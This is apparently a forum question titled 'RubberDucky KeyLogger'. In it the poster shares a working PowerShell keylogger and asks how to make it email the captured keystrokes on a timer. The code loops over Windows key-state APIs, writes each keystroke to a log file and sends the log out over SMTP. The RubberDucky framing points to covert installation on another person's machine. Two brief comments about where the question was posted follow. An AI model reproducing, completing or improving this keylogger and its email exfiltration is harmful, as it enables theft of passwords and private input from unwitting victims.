# RubberDucky KeyLogger

Tags: powershell

I'm working on a keylogger powershell script, but I want the logs to be sent to an email address. It is successfully doing so, except the email is only sent on machine restart, or if I manually execute the c.cmd command. Any way to schedule it, some sort of simple while statement that will $smtp.send in intervals?

Here's a snippet of the current code

```
    # set up API
 $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru

  # attempt to log keystrokes
  try {

    # loops keystroke detection
    while ($true) {
      Start-Sleep -Milliseconds 40

      for ($ascii = 9; $ascii -le 254; $ascii++) {

        # use API to get key state
        $keystate = $API::GetAsyncKeyState($ascii)

        # use API to detect keystroke
        if ($keystate -eq -32767) {
          $null = [console]::CapsLock

          # map virtual key
          $mapKey = $API::MapVirtualKey($ascii, 3)

          # create a stringbuilder
          $keyboardState = New-Object Byte[] 256
          $hideKeyboardState = $API::GetKeyboardState($keyboardState)
          $loggedchar = New-Object -TypeName System.Text.StringBuilder

          # translate virtual key
          if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) {
            # add logged key to file
            [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode)
          }
        }
      }
    }
  }

  # send logs if code fails
  finally {
    # send email
    $smtp.Send($email, $email, $subject, $logs);
  }
}

# run keylogger
KeyLogger
```

Any help would be great!

Comment: yea wasn't sure where to post it, seen as this was the security forum thought i'd get more lucky here. thanks tho

Comment: And now we got a duplicate question instead ;)